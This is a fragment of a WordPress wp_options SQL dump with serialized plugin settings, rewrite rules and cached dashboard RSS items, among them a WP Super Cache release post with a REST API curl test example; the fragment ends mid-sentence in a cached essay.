(223, 'slideshow_option', 'a:13:{s:2:\"fx\";s:5:\"swirl\";s:5:\"delay\";s:4:\"3000\";s:10:\"navigation\";s:4:\"true\";s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"300\";s:3:\"spw\";s:1:\"7\";s:3:\"sph\";s:1:\"5\";s:6:\"sDelay\";s:2:\"30\";s:7:\"opacity\";s:1:\"1\";s:10:\"titleSpeed\";s:3:\"500\";s:10:\"jsmanually\";s:5:\"false\";s:11:\"cssmanually\";s:5:\"false\";s:10:\"hoverPause\";s:5:\"false\";}', 'yes'),
(775, 'seo_ultimate_module_autolinks', 'a:16:{s:25:\"dampen_sitewide_lpa_value\";i:50;s:34:\"enable_perlink_dampen_sitewide_lpa\";b:0;s:17:\"enable_self_links\";b:0;s:24:\"enable_current_url_links\";b:0;s:15:\"limit_lpp_value\";i:5;s:15:\"limit_lpa_value\";i:2;s:15:\"limit_lpu_value\";i:1;s:13:\"linkfree_tags\";s:30:\"code,pre,kbd,h1,h2,h3,h4,h5,h6\";s:22:\"autolink_posttype_post\";b:1;s:22:\"autolink_posttype_page\";b:1;s:28:\"autolink_posttype_attachment\";b:1;s:31:\"autolink_posttype_collaborateur\";b:1;s:26:\"footer_link_section_format\";s:67:\"<div id=\"su-footer-links\" style=\"text-align: center;\">{links}</div>\";s:18:\"footer_link_format\";s:6:\"{link}\";s:15:\"footer_link_sep\";s:3:\" | \";s:5:\"links\";a:0:{}}', 'yes'),
(776, 'seo_ultimate_module_settings', 'a:3:{s:16:\"attribution_link\";b:0;s:9:\"mark_code\";b:1;s:11:\"wp_ultimate\";b:1;}', 'yes'),
(777, 'seo_ultimate_module_internal-link-aliases', 'a:2:{s:9:\"alias_dir\";s:2:\"go\";s:7:\"aliases\";a:0:{}}', 'yes'),
(778, 'seo_ultimate_module_linkbox', 'a:1:{s:4:\"html\";s:298:\"<div class=\"su-linkbox\" id=\"post-{id}-linkbox\"><div class=\"su-linkbox-label\">Link to this post!</div><div class=\"su-linkbox-field\"><input type=\"text\" value=\"&lt;a href=&quot;{url}&quot;&gt;{title}&lt;/a&gt;\" onclick=\"javascript:this.select()\" readonly=\"readonly\" style=\"width: 100%;\" /></div></div>\";}', 'yes'),
(561, 'easy_table_plugin_option', 'a:20:{s:12:\"shortcodetag\";s:5:\"table\";s:7:\"attrtag\";s:4:\"attr\";s:11:\"tablewidget\";s:0:\"\";s:12:\"scriptloadin\";a:7:{i:0;s:0:\"\";i:1;s:9:\"is_single\";i:2;s:0:\"\";i:3;s:7:\"is_page\";i:4;s:0:\"\";i:5;s:0:\"\";i:6;s:0:\"\";}s:14:\"scriptinfooter\";s:0:\"\";s:11:\"tablesorter\";s:0:\"\";s:2:\"th\";s:0:\"\";s:7:\"loadcss\";s:1:\"1\";s:5:\"class\";s:0:\"\";s:5:\"width\";s:4:\"100%\";s:6:\"border\";s:1:\"0\";s:5:\"theme\";s:8:\"cuscosky\";s:5:\"limit\";s:1:\"0\";s:4:\"trim\";s:0:\"\";s:2:\"nl\";s:2:\"~~\";s:10:\"terminator\";s:2:\"\\n\";s:9:\"delimiter\";s:1:\",\";s:9:\"enclosure\";s:6:\"&quot;\";s:6:\"escape\";s:1:\"\\\";s:7:\"csvfile\";s:0:\"\";}', 'yes'),
(779, 'seo_ultimate_module_meta', 'a:6:{s:32:\"home_description_tagline_default\";b:1;s:25:\"description_posttype_post\";s:9:\"{excerpt}\";s:25:\"description_posttype_page\";s:0:\"\";s:29:\"description_taxonomy_category\";s:13:\"{description}\";s:29:\"description_taxonomy_post_tag\";s:13:\"{description}\";s:17:\"description_paged\";s:31:\"{meta_description} - Page {num}\";}', 'yes'),
(621, 'wpcf7', 'a:1:{s:7:\"version\";s:5:\"3.5.3\";}', 'yes'),
(623, '_transient_random_seed', 'ac680a95f58c8f6a2699cbfd17ea0511', 'yes'),
(121531, 'rewrite_rules', 'a:87:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}', 'yes'),
(631, 'category_children', 'a:0:{}', 'yes'),
(784, 'seo_ultimate_module_slugs', 'a:1:{s:15:\"words_to_remove\";s:4221:\"a\nable\nabout\nabove\nabroad\naccording\naccordingly\nacross\nactually\nadj\nafter\nafterwards\nagain\nagainst\nago\nahead\nain\'t\nall\nallow\nallows\nalmost\nalone\nalong\nalongside\nalready\nalso\nalthough\nalways\nam\namid\namidst\namong\namongst\nan\nand\nanother\nany\nanybody\nanyhow\nanyone\nanything\nanyway\nanyways\nanywhere\napart\nappear\nappreciate\nappropriate\nare\naren\'t\naround\nas\na\'s\naside\nask\nasking\nassociated\nat\navailable\naway\nawfully\nb\nback\nbackward\nbackwards\nbe\nbecame\nbecause\nbecome\nbecomes\nbecoming\nbeen\nbefore\nbeforehand\nbegin\nbehind\nbeing\nbelieve\nbelow\nbeside\nbesides\nbest\nbetter\nbetween\nbeyond\nboth\nbrief\nbut\nby\nc\ncame\ncan\ncannot\ncant\ncan\'t\ncaption\ncause\ncauses\ncertain\ncertainly\nchanges\nclearly\nc\'mon\nco\nco.\ncom\ncome\ncomes\nconcerning\nconsequently\nconsider\nconsidering\ncontain\ncontaining\ncontains\ncorresponding\ncould\ncouldn\'t\ncourse\nc\'s\ncurrently\nd\ndare\ndaren\'t\ndefinitely\ndescribed\ndespite\ndid\ndidn\'t\ndifferent\ndirectly\ndo\ndoes\ndoesn\'t\ndoing\ndone\ndon\'t\ndown\ndownwards\nduring\ne\neach\nedu\neg\neight\neighty\neither\nelse\nelsewhere\nend\nending\nenough\nentirely\nespecially\net\netc\neven\never\nevermore\nevery\neverybody\neveryone\neverything\neverywhere\nex\nexactly\nexample\nexcept\nf\nfairly\nfar\nfarther\nfew\nfewer\nfifth\nfirst\nfive\nfollowed\nfollowing\nfollows\nfor\nforever\nformer\nformerly\nforth\nforward\nfound\nfour\nfrom\nfurther\nfurthermore\ng\nget\ngets\ngetting\ngiven\ngives\ngo\ngoes\ngoing\ngone\ngot\ngotten\ngreetings\nh\nhad\nhadn\'t\nhalf\nhappens\nhardly\nhas\nhasn\'t\nhave\nhaven\'t\nhaving\nhe\nhe\'d\nhe\'ll\nhello\nhelp\nhence\nher\nhere\nhereafter\nhereby\nherein\nhere\'s\nhereupon\nhers\nherself\nhe\'s\nhi\nhim\nhimself\nhis\nhither\nhopefully\nhow\nhowbeit\nhowever\nhundred\ni\ni\'d\nie\nif\nignored\ni\'ll\ni\'m\nimmediate\nin\ninasmuch\ninc\ninc.\nindeed\nindicate\nindicated\nindicates\ninner\ninside\ninsofar\ninstead\ninto\ninward\nis\nisn\'t\nit\nit\'d\nit\'ll\nits\nit\'s\nitself\ni\'ve\nj\njust\nk\nkeep\nkeeps\nkept\nknow\nknown\nknows\nl\nlast\nlately\nlater\nlatter\nlatterly\nleast\nless\nlest\nlet\nlet\'s\nlike\nliked\nlikely\nlikewise\nlittle\nlook\nlooking\nlooks\nlow\nlower\nltd\nm\nmade\nmainly\nmake\nmakes\nmany\nmay\nmaybe\nmayn\'t\nme\nmean\nmeantime\nmeanwhile\nmerely\nmight\nmightn\'t\nmine\nminus\nmiss\nmore\nmoreover\nmost\nmostly\nmr\nmrs\nmuch\nmust\nmustn\'t\nmy\nmyself\nn\nname\nnamely\nnd\nnear\nnearly\nnecessary\nneed\nneedn\'t\nneeds\nneither\nnever\nneverf\nneverless\nnevertheless\nnew\nnext\nnine\nninety\nno\nnobody\nnon\nnone\nnonetheless\nnoone\nno-one\nnor\nnormally\nnot\nnothing\nnotwithstanding\nnovel\nnow\nnowhere\no\nobviously\nof\noff\noften\noh\nok\nokay\nold\non\nonce\none\nones\none\'s\nonly\nonto\nopposite\nor\nother\nothers\notherwise\nought\noughtn\'t\nour\nours\nourselves\nout\noutside\nover\noverall\nown\np\nparticular\nparticularly\npast\nper\nperhaps\nplaced\nplease\nplus\npossible\npresumably\nprobably\nprovided\nprovides\nq\nque\nquite\nqv\nr\nrather\nrd\nre\nreally\nreasonably\nrecent\nrecently\nregarding\nregardless\nregards\nrelatively\nrespectively\nright\nround\ns\nsaid\nsame\nsaw\nsay\nsaying\nsays\nsecond\nsecondly\nsee\nseeing\nseem\nseemed\nseeming\nseems\nseen\nself\nselves\nsensible\nsent\nserious\nseriously\nseven\nseveral\nshall\nshan\'t\nshe\nshe\'d\nshe\'ll\nshe\'s\nshould\nshouldn\'t\nsince\nsix\nso\nsome\nsomebody\nsomeday\nsomehow\nsomeone\nsomething\nsometime\nsometimes\nsomewhat\nsomewhere\nsoon\nsorry\nspecified\nspecify\nspecifying\nstill\nsub\nsuch\nsup\nsure\nt\ntake\ntaken\ntaking\ntell\ntends\nth\nthan\nthank\nthanks\nthanx\nthat\nthat\'ll\nthats\nthat\'s\nthat\'ve\nthe\ntheir\ntheirs\nthem\nthemselves\nthen\nthence\nthere\nthereafter\nthereby\nthere\'d\ntherefore\ntherein\nthere\'ll\nthere\'re\ntheres\nthere\'s\nthereupon\nthere\'ve\nthese\nthey\nthey\'d\nthey\'ll\nthey\'re\nthey\'ve\nthing\nthings\nthink\nthird\nthirty\nthis\nthorough\nthoroughly\nthose\nthough\nthree\nthrough\nthroughout\nthru\nthus\ntill\nto\ntogether\ntoo\ntook\ntoward\ntowards\ntried\ntries\ntruly\ntry\ntrying\nt\'s\ntwice\ntwo\nu\nun\nunder\nunderneath\nundoing\nunfortunately\nunless\nunlike\nunlikely\nuntil\nunto\nup\nupon\nupwards\nus\nuse\nused\nuseful\nuses\nusing\nusually\nv\nvalue\nvarious\nversus\nvery\nvia\nviz\nvs\nw\nwant\nwants\nwas\nwasn\'t\nway\nwe\nwe\'d\nwelcome\nwell\nwe\'ll\nwent\nwere\nwe\'re\nweren\'t\nwe\'ve\nwhat\nwhatever\nwhat\'ll\nwhat\'s\nwhat\'ve\nwhen\nwhence\nwhenever\nwhere\nwhereafter\nwhereas\nwhereby\nwherein\nwhere\'s\nwhereupon\nwherever\nwhether\nwhich\nwhichever\nwhile\nwhilst\nwhither\nwho\nwho\'d\nwhoever\nwhole\nwho\'ll\nwhom\nwhomever\nwho\'s\nwhose\nwhy\nwill\nwilling\nwish\nwith\nwithin\nwithout\nwonder\nwon\'t\nwould\nwouldn\'t\nx\ny\nyes\nyet\nyou\nyou\'d\nyou\'ll\nyour\nyou\'re\nyours\nyourself\nyourselves\nyou\'ve\nz\nzero\";}', 'yes'),
(785, 'seo_ultimate_module_titles', 'a:14:{s:10:\"title_home\";s:6:\"{blog}\";s:12:\"title_single\";s:15:\"{post} | {blog}\";s:10:\"title_page\";s:15:\"{page} | {blog}\";s:14:\"title_category\";s:19:\"{category} | {blog}\";s:9:\"title_tag\";s:14:\"{tag} | {blog}\";s:9:\"title_day\";s:43:\"Archives for {month} {day}, {year} | {blog}\";s:11:\"title_month\";s:36:\"Archives for {month} {year} | {blog}\";s:10:\"title_year\";s:28:\"Archives for {year} | {blog}\";s:12:\"title_author\";s:26:\"Posts by {author} | {blog}\";s:12:\"title_search\";s:35:\"Search Results for {query} | {blog}\";s:9:\"title_404\";s:22:\"404 Not Found | {blog}\";s:11:\"title_paged\";s:20:\"{title} - Page {num}\";s:13:\"terms_ucwords\";b:1;s:14:\"rewrite_method\";s:2:\"ob\";}', 'yes'),
(786, 'seo_ultimate_module_sds-blog', 'a:2:{s:8:\"lastread\";i:1374769524;s:14:\"rss_item_times\";a:10:{i:0;i:1495180755;i:1;i:1494770118;i:2;i:1493812826;i:3;i:1493658175;i:4;i:1482336890;i:5;i:1462114135;i:6;i:1439476350;i:7;i:1435768577;i:8;i:1435657619;i:9;i:1435426977;}}', 'yes'),
(3035, 'auto_core_update_notified', 'a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:19:\"dpierrard@gmail.com\";s:7:\"version\";s:5:\"4.8.8\";s:9:\"timestamp\";i:1544677933;}', 'no'),
(121515, '_transient_timeout_feed_867bd5c64f85878d03a060509cd2f92c', '1500514530', 'no'),
(121516, '_transient_timeout_feed_mod_867bd5c64f85878d03a060509cd2f92c', '1500514530', 'no'),
(121517, '_transient_feed_mod_867bd5c64f85878d03a060509cd2f92c', '1500471330', 'no'),
(121514, '_transient_dash_4077549d03da2e451c8b5f002294ff51', '<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2017/07/the-month-in-wordpress-june-2017/\' title=\'We’re starting a new regular feature on this blog today. We’d like to keep everyone up-to-date about the happenings all across the WordPress open source project and highlight how you can get involved, so we’ll be posting a roundup of all the major WordPress news at the end of every month. Aside from other general […]\'>The Month in WordPress: June 2017</a> <span class=\"rss-date\">July 3, 2017</span><div class=\'rssSummary\'>We’re starting a new regular feature on this blog today. We’d like to keep everyone up-to-date about the happenings all across the WordPress open source project and highlight how you can get involved, so we’ll be posting a roundup of all the major WordPress news at the end of every month. Aside from other general […]</div></li><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2017/06/evans/\' title=\'An Update with You in Mind Gear up for a more intuitive WordPress! Version 4.8 of WordPress, named “Evans” in honor of jazz pianist and composer William John “Bill” Evans, is available for download or update in your WordPress dashboard. New features in 4.8 add more ways for you to express yourself and represent your brand. Though some […]\'>WordPress 4.8 “Evans”</a> <span class=\"rss-date\">June 8, 2017</span><div class=\'rssSummary\'>An Update with You in Mind Gear up for a more intuitive WordPress! Version 4.8 of WordPress, named “Evans” in honor of jazz pianist and composer William John “Bill” Evans, is available for download or update in your WordPress dashboard. New features in 4.8 add more ways for you to express yourself and represent your brand. Though some […]</div></li></ul></div>', 'no'),
(121513, '_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51', '1500514530', 'no'),
(121508, '_transient_timeout_dash_20494a3d90a6669585674ed0eb8dcd8f', '1500514529', 'no'),
(121509, '_transient_dash_20494a3d90a6669585674ed0eb8dcd8f', '<p><strong>RSS Error</strong>: A feed could not be found at http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://www.crosstrainingcenter.be/. A feed with an invalid mime type may fall victim to this error, or SimplePie was unable to auto-discover it.. Use force_feed() if you are certain this URL is a real feed.</p>', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(121519, '_transient_dash_aa95765b5cc111c56d5993d476b1c2f0', '<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://odd.blog/2017/07/19/wp-super-cache-1-5-0/\' title=\'WP Super Cache is a fast full-page caching plugin for WordPress. Download it from your dashboard or get it here. Version 1.5.0 has been in development for some time. It has a ton of bug fixes and new features.  REST API The headline new feature is REST API access to the settings. This will allow developers to create their own interface to the settings of the plugin. Unfortunately it isn’t yet documented but you can see the code in the rest directory. Start with load.php where you’ll find the code that registers all the endpoints. Users who access the API must be logged in as admin users. If you want to test the API, see the end of this post. Settings Page We have also simplified the settings page to make it easier to choose which caching method is used.   Instead of maybe confusing the user with technical words like PHP, mod_rewrite and WP-Cache we have split them up into “Simple” and “Expert” delivery methods, and done away with mentioning WP-Cache completely. Simple delivery uses PHP, expert uses mod_rewrite and well, WP-Cache got the boot because it’s always active anyway. WP-Cache caching is always active, but it can be disabled in different ways.   Disable caching for known users.  Don’t cache pages with GET parameters  Disable caching of feeds  Headers We expanded the number of headers cached by the plugin. The list of headers was borrowed from Comet Cache. However, anonymous users will still only see the bare minimum like content-length or content-type. If you need to use security headers like “X-Frame-Options” or “Content-Security-Policy” you should enable caching of HTTP headers. This unfortunately disables super caching so only WP-Caching is used but it’s still very fast (and faster in this release than before which I will get to below). You can also use the “wpsc_known_headers” filter to modify the list of recognised headers. WP-Cache Reorganisation WP-Cache cache files are split into two files – one holds the page content, the other (meta file) holds information about the page such as cookies, headers and url. In the past these files were stored in two directories which could become a problem if there were many thousands of those files. Even with only a few hundred files, maintenance could be an issue as deleting related files (like page archives, or copies of the front page) needed every meta file to be inspected. Now the files are stored in the supercache directory structure that mirrors your permalink structure. Deleting related files is is simpler and serving files will be faster as the operating system won’t need to open a directory of thousands of files. If you currently rely on WP-Cache files, the plugin will still look for them where they are, but new WP-Cache files will be created in cache/supercache/example.com/ (where example.com is your hostname). Sitemaps We added support for caching sitemaps, but your sitemap plugin will need to cooperate to get it to work. The sitemap plugin needs to identify the sitemap request as a feed. Jetpack 5.1 now supports this since #7397. You can disable the caching by excluding feeds from caching. Debugging Improved The debug log is now protected by a username/password. For convenience, the username and password are the same but they are a long md5 string:  Deleting the log file clears it and resets it ready for more logging. Before, toggling debugging would create a new debug log and the old one would be kept around, but not linked, until deleted by garbage collection, and of course they were text files anyone could access. This release includes lots of other small bug fixes and changes. Take a look at the number of closed PRs for an exhaustive list of those changes! Testing the REST API There are a number of ways to send POST requests to a web server but one I like is using curl in a shell script. You’ll need two bits of information from the website:   The “wordpress_logged_in” cookie from your browser.  The wp_rest nonce which you can get by adding `echo wp_create_nonce( ‘wp_rest’ );` somewhere on your site where you’re logged in. It’s good for 24 hours.  My test script looks something like this: export NONCE=&#039;1234567890&#039; export COOKIE=&#039;wordpress_logged_in_xxxxxxxxxxxxxxxxxxxx=1234567890&#039; curl -v -X &quot;GET&quot; -H &quot;Content-Type: application/json&quot; -H &quot;X-WP-Nonce: $NONCE&quot; -H &quot;Cache-Control: no-cache&quot; -H &quot;Cookie: wordpress_test_cookie=WP+Cookie+check; $COOKIE&quot; \\ -d &#039;{}&#039; &quot;https://example.com/wp-json/wp-super-cache/v1/settings/&quot;  Related Posts WP Super Cache 0.8.4, the garbage collector WP Super Cache 0.8.7 WP Super Cache 0.9.9 Source\'>Donncha: WP Super Cache 1.5.0</a></li><li><a class=\'rsswidget\' href=\'https://heropress.com/essays/becoming-myself-again/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=becoming-myself-again\' title=\'It’s so easy to become secluded and sit at home, in your own bubble, but it wasn’t until a group of people literally pulled me in with their welcoming atmosphere and demeanor, that I realised that I could function amongst other people as well (even if it was somewhat limited). In The Beginning To understand my bubble, you need to also know a little about me, or rather, about my childhood. I had a less than ideal childhood. I have a great family, lived in a great house, even in the “best country in the world” as they say. And despite this, I say I wasn’t happy with my childhood. My school years were the reason, they were rough. At times I think back and feel like events that unfolded were parts of ridiculous scenes from an over the top movie. All in all, the days seemed generic enough, except my school days were a thing of dread. I would suffer physical and verbal abuse throughout my schooldays, even going to and from school, I had no real friends (victim by association is understandably not something a child would want to intentionally walk into. I understand this as an adult, but as a child it’s not that easy). Because of my treatment over the years, I developed trust issues, I got a fear for everyone around me, and it was growing stronger and stronger over the years. I suppressed it, I lied about it, and I got terrifyingly good at the lying part. This is why I was drawn to the internet: I didn’t have to interact with people, I didn’t need to go outside where the others were, I could just do my thing and move on. I could live in my own bubble. Finding WordPress But then the darndest thing happened. I’d been stuck on a project, I needed help, and I turned to a support room for an open source project, for WordPress. If you’ve ever tried to get help in a chat before, you’ll know what kind of an experience it can be, the snarky reactions to your code, the nitpicking of using the wrong terminology, it’s not fun. This place though, they didn’t care that I was not only using the wrong terms, but my entire code was a horrible mess. Where I would usually get the help I needed and move on, popping back in my bubble of solitude, I instead wanted to be like these people, I wanted to use what I learnt to let others get helped. Over the years, I all but devote myself to that place. Nobody knew me, I liked staying under the radar, but eventually I got pushed into a team meeting. I was intrigued, so I would watch, I’d say hi, and progressively make my opinions heard. Yet, I would 